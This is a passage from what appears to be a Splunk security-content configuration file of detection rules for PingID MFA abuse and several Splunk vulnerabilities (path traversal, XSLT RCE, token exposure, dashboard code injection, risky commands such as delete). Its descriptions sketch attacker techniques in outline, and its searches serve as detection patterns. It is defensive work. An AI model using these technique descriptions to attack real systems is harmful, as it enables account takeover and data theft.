coalesce('resources{}.ipaddress',policy_ipaddress), app = coalesce(Requested_Application_ID,Requested_Application_Name) | fields app, user, session_id, src, signature ] | iplocation prefix=auth_ dest | iplocation prefix=verify_ src | stats count min(_time) as firstTime max(_time) as lastTime values(app) as app values(session_id) as session_id by user, dest, auth_Country, src, verify_Country, object, signature, status, reason | where auth_Country != verify_Country | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `pingid_mismatch_auth_source_and_verification_response_filter` [ESCU - PingID Multiple Failed MFA Requests For User - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies multiple failed multi-factor authentication requests for a single user within a PingID (PingOne) environment. Specifically, the analytic triggers when 10 or more MFA user prompts fail within 10 minutes. PingID environments can be very different depending on the organization, Security teams should test this detection and customize these arbitrary thresholds. The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls potentially resulting in the user finally accepting the authentication request. Threat actors like the Lapsus team and APT29 have leveraged this technique to bypass multi-factor authentication controls as reported by Mandiant and others. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1621", "T1078", "T1110"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies multiple failed multi-factor authentication requests for a single user within a PingID (PingOne) environment. Specifically, the analytic triggers when 10 or more MFA user prompts fail within 10 minutes. PingID environments can be very different depending on the organization, Security teams should test this detection and customize these arbitrary thresholds. The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls potentially resulting in the user finally accepting the authentication request. Threat actors like the Lapsus team and APT29 have leveraged this technique to bypass multi-factor authentication controls as reported by Mandiant and others. action.escu.how_to_implement = Target environment must ingest JSON logging from a PingID(PingOne) enterprise environment, either via Webhook or Push Subscription. action.escu.known_false_positives = False positives may be generated by normal provisioning workflows for user device registration. action.escu.creation_date = 2023-09-26 action.escu.modification_date = 2023-09-26 action.escu.confidence = high action.escu.full_search_name = ESCU - PingID Multiple Failed MFA Requests For User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Ping ID"] action.escu.analytic_story = ["Compromised User Account"] action.risk = 1 action.risk.param._risk_message = Multiple Failed MFA requests $mfa_prompts$ for user $user$ between $firstTime$ and $lastTime$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 50}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - PingID Multiple Failed MFA Requests For User - Rule action.correlationsearch.annotations = {"analytic_story": ["Compromised User Account"], "cis20": ["CIS 10"], "confidence": 50, "impact": 100, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1621", "T1078", "T1110"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies multiple failed multi-factor authentication requests for a single user within a PingID (PingOne) environment. Specifically, the analytic triggers when 10 or more MFA user prompts fail within 10 minutes. PingID environments can be very different depending on the organization, Security teams should test this detection and customize these arbitrary thresholds. The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls potentially resulting in the user finally accepting the authentication request. Threat actors like the Lapsus team and APT29 have leveraged this technique to bypass multi-factor authentication controls as reported by Mandiant and others. action.notable.param.rule_title = PingID Multiple Failed MFA Requests For User action.notable.param.security_domain = access action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `pingid` "result.status" IN ("FAILURE,authFail","UNSUCCESSFUL_ATTEMPT") | eval time = _time, src = coalesce('resources{}.ipaddress','resources{}.devicemodel'), user = upper('actors{}.name'), object = 'resources{}.devicemodel', reason = 'result.message'| bucket span=10m _time | stats dc(_raw) AS mfa_prompts min(time) as firstTime, max(time) as lastTime values(src) as src by user, reason, _time | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | where mfa_prompts >= 10 | `pingid_multiple_failed_mfa_requests_for_user_filter` [ESCU - PingID New MFA Method After Credential Reset - Rule] action.escu = 0 action.escu.enabled = 1 description = A common social engineering technique used by threat actors is the impersonation of a valid user to organizational support staff for a password reset. During the same support call or quickly afterwards the threat actor will request provisioning of a new MFA device. This does not require malware or phishing infrastructure and has proven to be successful in numerous historical attacks. This detection looks for the pattern of password reset, followed by MFA device provisioning. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1621", "T1556.006", "T1098.005"], "nist": ["DE.CM"]} action.escu.data_models = ["Change"] action.escu.eli5 = A common social engineering technique used by threat actors is the impersonation of a valid user to organizational support staff for a password reset. During the same support call or quickly afterwards the threat actor will request provisioning of a new MFA device. This does not require malware or phishing infrastructure and has proven to be successful in numerous historical attacks. This detection looks for the pattern of password reset, followed by MFA device provisioning. action.escu.how_to_implement = Target environment must ingest Windows Event Log and PingID(PingOne) data sources. Specifically from logs from Active Directory Domain Controllers and JSON logging from a PingID(PingOne) enterprise environment, either via Webhook or Push Subscription. action.escu.known_false_positives = False positives may be generated by normal provisioning workflows that generate a password reset followed by a device registration. action.escu.creation_date = 2023-09-26 action.escu.modification_date = 2023-09-26 action.escu.confidence = high action.escu.full_search_name = ESCU - PingID New MFA Method After Credential Reset - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Ping ID"] action.escu.analytic_story = ["Compromised User Account"] action.risk = 1 action.risk.param._risk_message = An MFA configuration change was detected for [$user$] within [$timeDiff$] of a password reset. The device [$object$] was $action$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 50}, {"risk_object_field": "object", "risk_object_type": "other", "risk_score": 50}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - PingID New MFA Method After Credential Reset - Rule action.correlationsearch.annotations = {"analytic_story": ["Compromised User Account"], "cis20": ["CIS 10"], "confidence": 50, "impact": 100, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1621", "T1556.006", "T1098.005"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = A common social engineering technique used by threat actors is the impersonation of a valid user to organizational support staff for a password reset. During the same support call or quickly afterwards the threat actor will request provisioning of a new MFA device. This does not require malware or phishing infrastructure and has proven to be successful in numerous historical attacks. This detection looks for the pattern of password reset, followed by MFA device provisioning. action.notable.param.rule_title = PingID New MFA Method After Credential Reset action.notable.param.security_domain = access action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `pingid` "result.message" = "*Device Paired*" | rex field=result.message "Device (Unp)?(P)?aired (?.+)" | eval src = coalesce('resources{}.ipaddress','resources{}.devicemodel'), user = upper('actors{}.name'), reason = 'result.message' | eval object=CASE(ISNOTNULL('resources{}.devicemodel'),'resources{}.devicemodel',true(),device_extract) | eval action=CASE(match('result.message',"Device Paired*"),"created",match('result.message', "Device Unpaired*"),"deleted") | stats count min(_time) as firstTime, max(_time) as lastTime, values(reason) as reason by src,user,action,object | join type=outer user [| search `wineventlog_security` EventID IN(4723,4724) | eval PW_Change_Time = _time, user = upper(user) | fields user,src_user,EventID,PW_Change_Time] | eval timeDiffRaw = round(lastTime - PW_Change_Time) | eval timeDiff = replace(tostring(abs(timeDiffRaw) ,"duration"),"(\d*)\+*(\d+):(\d+):(\d+)","\2 hours \3 minutes") | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `security_content_ctime(PW_Change_Time)` | where timeDiffRaw > 0 AND timeDiffRaw < 3600 | `pingid_new_mfa_method_after_credential_reset_filter` [ESCU - PingID New MFA Method Registered For User - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the registration of a new Multi Factor authentication method for a PingID (PingOne) account. Adversaries who have obtained unauthorized access to a user account may register a new MFA method to maintain persistence. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1621", "T1556.006", "T1098.005"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the registration of a new Multi Factor authentication method for a PingID (PingOne) account. Adversaries who have obtained unauthorized access to a user account may register a new MFA method to maintain persistence. action.escu.how_to_implement = Target environment must ingest JSON logging from a PingID(PingOne) enterprise environment, either via Webhook or Push Subscription. action.escu.known_false_positives = False positives may be generated by normal provisioning workflows for user device registration. action.escu.creation_date = 2023-09-26 action.escu.modification_date = 2023-09-26 action.escu.confidence = high action.escu.full_search_name = ESCU - PingID New MFA Method Registered For User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Ping ID"] action.escu.analytic_story = ["Compromised User Account"] action.risk = 1 action.risk.param._risk_message = An MFA configuration change was detected for [$user$], the device [$object$] was $action$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 10}, {"risk_object_field": "src", "risk_object_type": "system", "risk_score": 10}, {"risk_object_field": "object", "risk_object_type": "other", "risk_score": 10}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - PingID New MFA Method Registered For User - Rule action.correlationsearch.annotations = {"analytic_story": ["Compromised User Account"], "cis20": ["CIS 10"], "confidence": 50, "impact": 20, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1621", "T1556.006", "T1098.005"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the registration of a new Multi Factor authentication method for a PingID (PingOne) account. Adversaries who have obtained unauthorized access to a user account may register a new MFA method to maintain persistence. action.notable.param.rule_title = PingID New MFA Method Registered For User action.notable.param.security_domain = access action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `pingid` "result.message"="Device Paired*" result.status="SUCCESS" | rex field=result.message "Device (Unp)?(P)?aired (?.+)" | eval src = coalesce('resources{}.ipaddress','resources{}.devicemodel'), user = upper('actors{}.name'), reason = 'result.message' | eval object=CASE(ISNOTNULL('resources{}.devicemodel'),'resources{}.devicemodel',true(),device_extract) | eval action=CASE(match('result.message',"Device Paired*"),"created",match('result.message', "Device Unpaired*"),"deleted") | stats count min(_time) as firstTime, max(_time) as lastTime by src,user,object,action,reason | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `pingid_new_mfa_method_registered_for_user_filter` [ESCU - Splunk Absolute Path Traversal Using runshellscript - Rule] action.escu = 0 action.escu.enabled = 1 description = In Splunk Enterprise versions lower than 8.2.12, 9.0.6, and 9.1.1, an attacker can exploit an absolute path traversal to execute arbitrary code that is located on a separate disk. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1083"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = In Splunk Enterprise versions lower than 8.2.12, 9.0.6, and 9.1.1, an attacker can exploit an absolute path traversal to execute arbitrary code that is located on a separate disk. action.escu.how_to_implement = Must have access to internal indexes. Only applies to Splunk on Windows versions. action.escu.known_false_positives = The command runshellscript can be used for benign purposes. Analyst will have to review the searches and determined maliciousness specially by looking at targeted script. action.escu.creation_date = 2023-09-05 action.escu.modification_date = 2023-09-05 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk Absolute Path Traversal Using runshellscript - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk Absolute Path Traversal Using runshellscript - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 70, "cve": ["CVE-2023-40597"], "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1083"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunk_python` *runshellscript* | eval log_split=split(_raw, "runshellscript: ") | eval array_raw = mvindex(log_split,1) | eval data_cleaned=replace(replace(replace(array_raw,"\[",""),"\]",""),"'","") | eval array_indices=split(data_cleaned,",") | eval runshellscript_args_count=mvcount(array_indices) | where runshellscript_args_count = 10 | eval interpreter=mvindex(array_indices,0) | eval targetScript=mvindex(array_indices,1) | eval targetScript != "*C:*" | stats count min(_time) as firstTime max(_time) as lastTime by splunk_server interpreter targetScript | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `splunk_absolute_path_traversal_using_runshellscript_filter` [ESCU - Splunk Account Discovery Drilldown Dashboard Disclosure - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. Splunk drilldown vulnerability disclosure in Dashboard application that can potentially allow exposure of tokens from privilege users. An attacker can create dashboard and share it to privileged user (admin) and detokenize variables using external urls within dashboards drilldown function. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = Splunk drilldown vulnerability disclosure in Dashboard application that can potentially allow exposure of tokens from privilege users. An attacker can create dashboard and share it to privileged user (admin) and detokenize variables using external urls within dashboards drilldown function. action.escu.how_to_implement = This search uses REST function to query for dashboards with environment variables present in URL options. action.escu.known_false_positives = This search may reveal non malicious URLs with environment variables used in organizations. action.escu.creation_date = 2022-08-02 action.escu.modification_date = 2022-08-02 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk Account Discovery Drilldown Dashboard Disclosure - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] action.risk = 1 action.risk.param._risk_message = Potential exposure of environment variables from url embedded in dashboard action.risk.param._risk = [{"risk_object_field": "author", "risk_object_type": "other", "risk_score": 40}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Splunk Account Discovery Drilldown Dashboard Disclosure - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 80, "cve": ["CVE-2022-37438"], "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Splunk drilldown vulnerability disclosure in Dashboard application that can potentially allow exposure of tokens from privilege users. An attacker can create dashboard and share it to privileged user (admin) and detokenize variables using external urls within dashboards drilldown function. action.notable.param.rule_title = Splunk Account Discovery Drilldown Dashboard Disclosure action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | rest splunk_server=local /servicesNS/-/-/data/ui/views | search eai:data="*$env:*" eai:data="*url*" eai:data="*options*" | rename author AS Author eai:acl.sharing AS Permissions eai:appName AS App eai:data AS "Dashboard XML" | fields Author Permissions App "Dashboard XML" | `splunk_account_discovery_drilldown_dashboard_disclosure_filter` [ESCU - Splunk App for Lookup File Editing RCE via User XSLT - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search provides information to investigate possible remote code execution exploitation via user-supplied Extensible Stylesheet Language Transformations (XSLT), affecting Splunk versions 9.1.x. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1210"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides information to investigate possible remote code execution exploitation via user-supplied Extensible Stylesheet Language Transformations (XSLT), affecting Splunk versions 9.1.x. action.escu.how_to_implement = Because there is no way to detect the payload, this search only provides the ability to monitor the creation of lookups which are the base of this exploit. An operator must then investigate suspicious lookups. This search requires ability to perform REST queries. Note that if the Splunk App for Lookup File Editing is not, or was not, installed in the Splunk environment then it is not necessary to run the search as the enviornment was not vulnerable. action.escu.known_false_positives = This search will provide information for investigation and hunting of lookup creation via user-supplied XSLT which may be indications of possible exploitation. There will be false positives as it is not possible to detect the payload executed via this exploit. action.escu.creation_date = 2023-11-16 action.escu.modification_date = 2023-11-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk App for Lookup File Editing RCE via User XSLT - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Splunk App for Lookup File Editing RCE via User XSLT - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 2, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1210"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | rest splunk_server=local /services/data/lookup-table-files/ | fields title author disabled eai:acl.app eai:acl.owner eai:acl.sharing eai:appName eai:data | `splunk_app_for_lookup_file_editing_rce_via_user_xslt_filter` [ESCU - Splunk Authentication Token Exposure in Debug Log - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection search finds exposed authentication tokens in debug logs. This issue occurs in Splunk Enterprise versions below 9.2.1, 9.1.4, and 9.0.9, which may be affected by a vulnerability where JsonWebTokens can be exposed if the log level is set to DEBUG. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1654"], "nist": ["DE.CM"]} action.escu.data_models = ["Web"] action.escu.eli5 = This detection search finds exposed authentication tokens in debug logs. This issue occurs in Splunk Enterprise versions below 9.2.1, 9.1.4, and 9.0.9, which may be affected by a vulnerability where JsonWebTokens can be exposed if the log level is set to DEBUG. action.escu.how_to_implement = Requires access to internal Splunk indexes. action.escu.known_false_positives = Only applies to affected versions of Splunk Enterprise below 9.2.1, 9.1.4, and 9.0.9 action.escu.creation_date = 2024-03-18 action.escu.modification_date = 2024-03-18 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk Authentication Token Exposure in Debug Log - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] action.risk = 1 action.risk.param._risk_message = Possible JsonWebToken exposure, please investigate affected $host$ action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "system", "risk_score": 50}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk Authentication Token Exposure in Debug Log - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2024-29945"], "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1654"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This detection search finds exposed authentication tokens in debug logs. This issue occurs in Splunk Enterprise versions below 9.2.1, 9.1.4, and 9.0.9, which may be affected by a vulnerability where JsonWebTokens can be exposed if the log level is set to DEBUG. action.notable.param.rule_title = Splunk Authentication Token Exposure in Debug Log action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunkd` component=JsonWebToken log_level=DEBUG eventtype="splunkd-log" event_message="Validating token:*" | rex "Validating token: (?.*)\.$" | search token!=None | stats count min(_time) as firstTime max(_time) as lastTime values(log_level) as log_level values(event_message) as event_message by index, sourcetype, host, token | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `splunk_authentication_token_exposure_in_debug_log_filter` [ESCU - Splunk Code Injection via custom dashboard leading to RCE - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This hunting search provides information about a vulnerability in Splunk Enterprise versions below 8.2.9, 8.1.12, 9.0.2, where an authenticated user can execute arbitrary code via the dashboard pdf generation component. Please review events with file=export in the _internal index for the potential targets of exploitation. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1210"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This hunting search provides information about a vulnerability in Splunk Enterprise versions below 8.2.9, 8.1.12, 9.0.2, where an authenticated user can execute arbitrary code via the dashboard pdf generation component. Please review events with file=export in the _internal index for the potential targets of exploitation. action.escu.how_to_implement = This detection does not require you to ingest any new data. The detection does require the ability to search the _internal index. action.escu.known_false_positives = Not all exports and downloads are malicious, special attention must be put as well on /en-US/splunkd/__raw/services/pdfgen/render in the context of this search. action.escu.creation_date = 2022-10-11 action.escu.modification_date = 2022-10-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk Code Injection via custom dashboard leading to RCE - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Splunk Internal Logs"] action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Splunk Code Injection via custom dashboard leading to RCE - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2022-43571"], "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1210"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunkd_ui` uri_path=*/data/ui/views/* OR uri_path=*saved/searches/* | dedup uri_path | eval URL=urldecode("uri_path")| rex field=URL "\/saved\/searches\/(?[^\/]*)" | rex field=URL "\/data\/ui\/views\/(?[^\/]*)" | eval NAME=NAME."( Saved Search )",NAME1=NAME1."( Dashboard )" | eval NAME=coalesce(NAME,NAME1) | eval STATUS=case(match(status,"2\d+"),"SUCCESS",match(status,"3\d+"),"REDIRECTION",match(status,"4\d+") OR match(status,"5\d+"),"ERROR") | stats list(NAME) as DASHBOARD_TITLE,list(method) as HTTP_METHOD,list(status) as Status_Code,list(STATUS) as STATUS by user | rename user as User | `splunk_code_injection_via_custom_dashboard_leading_to_rce_filter` [ESCU - Splunk Command and Scripting Interpreter Delete Usage - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the use of the risky command - Delete - that may be utilized in Splunk to delete some or all data queried for. In order to use Delete in Splunk, one must be assigned the role. This is typically not used and should generate an anomaly if it is used. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.AE"]} action.escu.data_models = ["Splunk_Audit"] action.escu.eli5 = The following analytic identifies the use of the risky command - Delete - that may be utilized in Splunk to delete some or all data queried for. In order to use Delete in Splunk, one must be assigned the role. This is typically not used and should generate an anomaly if it is used. action.escu.how_to_implement = To successfully implement this search acceleration is recommended against the Search_Activity datamodel that runs against the splunk _audit index. In addition, this analytic requires the Common Information Model App which includes the Splunk Audit Datamodel https://splunkbase.splunk.com/app/1621/. action.escu.known_false_positives = False positives may be present if this command is used as a common practice. Filter as needed. action.escu.creation_date = 2022-05-27 action.escu.modification_date = 2022-05-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk Command and Scripting Interpreter Delete Usage - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] action.risk = 1 action.risk.param._risk_message = $user$ executed the 'delete' command, if this is unexpected it should be reviewed. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 27}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk Command and Scripting Interpreter Delete Usage - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 30, "cve": ["CVE-2022-32154"], "impact": 90, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Splunk_Audit.Search_Activity where Search_Activity.search IN ("*| delete*") Search_Activity.search_type=adhoc Search_Activity.user!=splunk-system-user by Search_Activity.search Search_Activity.info Search_Activity.total_run_time Search_Activity.user Search_Activity.search_type | `drop_dm_object_name(Search_Activity)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `splunk_command_and_scripting_interpreter_delete_usage_filter` [ESCU - Splunk Command and Scripting Interpreter Risky Commands - Rule] action.escu = 0 action.escu.enabled = 1 description = The Splunk platform contains built-in search processing language (SPL) safeguards to warn you when you are about to unknowingly run a search that contains commands that might be a security risk. This warning appears when you click a link or type a URL that loads a search that contains risky commands. The warning does not appear when you create ad hoc searches. This warning alerts you to the possibility of unauthorized actions by a malicious user. Unauthorized actions include - Copying or transferring data (data exfiltration), Deleting data and Overwriting data. All risky commands may be found here https://docs.splunk.com/Documentation/Splunk/latest/Security/SPLsafeguards#Commands_that_trigger_the_warninga. A possible scenario when this might occur is when a malicious actor creates a search that includes commands that exfiltrate or damage data. The malicious actor then sends an unsuspecting user a link to the search. The URL contains a query string (q) and a search identifier (sid), but the sid is not valid. The malicious actor hopes the user will use the link and the search will run. During analysis, pivot based on user name and filter any user or queries not needed. Queries ran from a dashboard are seen as adhoc queries. When a query runs from a dashboard it will not show in audittrail logs the source dashboard name. The query defaults to adhoc and no Splunk system user activity. In addition, modify this query by removing key commands that generate too much noise, or too little, and create separate queries with higher confidence to alert on. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.AE"]} action.escu.data_models = ["Splunk_Audit"] action.escu.eli5 = The Splunk platform contains built-in search processing language (SPL) safeguards to warn you when you are about to unknowingly run a search that contains commands that might be a security risk. This warning appears when you click a link or type a URL that loads a search that contains risky commands. The warning does not appear when you create ad hoc searches. This warning alerts you to the possibility of unauthorized actions by a malicious user. Unauthorized actions include - Copying or transferring data (data exfiltration), Deleting data and Overwriting data. All risky commands may be found here https://docs.splunk.com/Documentation/Splunk/latest/Security/SPLsafeguards#Commands_that_trigger_the_warninga. A possible scenario when this might occur is when a malicious actor creates a search that includes commands that exfiltrate or damage data. The malicious actor then sends an unsuspecting user a link to the search. The URL contains a query string (q) and a search identifier (sid), but the sid is not valid. The malicious actor hopes the user will use the link and the search will run. During analysis, pivot based on user name and filter any user or queries not needed. Queries ran from a dashboard are seen as adhoc queries. When a query runs from a dashboard it will not show in audittrail logs the source dashboard name. The query defaults to adhoc and no Splunk system user activity. In addition, modify this query by removing key commands that generate too much noise, or too little, and create separate queries with higher confidence to alert on. action.escu.how_to_implement = To successfully implement this search acceleration is recommended against the Search_Activity datamodel that runs against the splunk _audit index. In addition, this analytic requires the Common Information Model App which includes the Splunk Audit Datamodel https://splunkbase.splunk.com/app/1621/. Splunk 